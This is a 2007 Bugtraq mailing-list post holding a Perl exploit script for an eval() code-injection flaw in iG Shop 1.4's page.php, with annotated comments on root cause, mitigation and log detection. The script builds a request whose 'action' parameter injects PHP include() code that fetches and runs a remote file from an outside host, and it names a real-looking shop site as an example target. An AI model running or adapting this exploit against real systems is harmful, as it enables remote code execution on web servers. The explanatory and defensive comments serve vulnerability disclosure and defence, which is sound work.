Message-ID: <20070619064954.9648.qmail@securityfocus.com>
Date: 19 Jun 2007 06:49:54 -0000
From: ifx@...u.us
To: bugtraq@...urityfocus.com
Subject: iG Shop 1.4 eval Inclusion Vulnerability
#!/usr/bin/perl -w
use LWP::UserAgent;
####################################################################
# iG Shop 1.4 eval Inclusion Vulnerability
# found by IFX #nyubicrew
#
# Vulnerable code, as quoted by the author from page.php:
#
#   if (!$action)
#       $action = "make";
#   // here the function will be called.
#   eval ("page_$action();");
#
# Root cause: the request parameter `action` is concatenated into a
# string that is handed to PHP's eval() with no validation, so the
# value is not limited to the suffix of an existing page_*() function
# name; any PHP code placed in it is executed by the application.
#
# Mitigation (for maintainers of page.php): do not build the call with
# eval(). Compare `action` against a fixed allowlist of known page names
# and dispatch only on an exact match, rejecting anything else.
# Setting allow_url_include=Off in php.ini blocks the remote include
# used below, but it does NOT fix the eval() injection itself.
#
# Detection: in web server logs, look for requests to page.php whose
# `action` value contains characters that cannot appear in a function
# name (such as `|`, `(`, `$`, `;`), or that carry an extra parameter
# holding an http:// URL; also look for outbound HTTP requests
# originating from the web server's PHP process.
####################################################################

# Print a usage line and exit when no base URL was given.
die "Example: perl $0 http://www.planetgolfuk.co.uk/shop\n" unless @ARGV;

# Create the HTTP client. NOTE(review): the script runs without
# `use strict`, so $b, $url, $res and $respone are package globals;
# $b is also one of the special variables used by sort().
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";

# Present a browser-like User-Agent header, so this header alone will
# not distinguish the request from ordinary traffic in access logs.
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

# Build the request URL from the base given on the command line.
# `action` carries PHP code instead of a page name, and that code
# include()s whatever the second parameter, `cok`, points to (here a
# remote text file hosted by the author).
$url = $ARGV[0] . "/page.php?action=|include(\$_GET\[cok\]);//phpinfo&cok=http://h1.ripside.net/ifx/a.txt?";

# Send a single GET request and keep the response body.
$res = $b->request(HTTP::Request->new(GET=>$url));
$respone = $res->content;

# Look (case-insensitively) for a marker string in the response body;
# presumably this is text emitted by the included remote file - TODO confirm.
if ($respone =~ /nyelipin file ;P/i){
# Marker found: report success (the message appears to be Indonesian
# for roughly "got through") and echo the URL that was requested.
print "\nTembus...\n";
print "\n$url\n";
}
else{
# Marker not found. The HTTP status is never inspected, so this branch
# is also taken on network or server errors; a failure message here
# does not show that page.php has been fixed.
print "\nGagal cok...\n";
}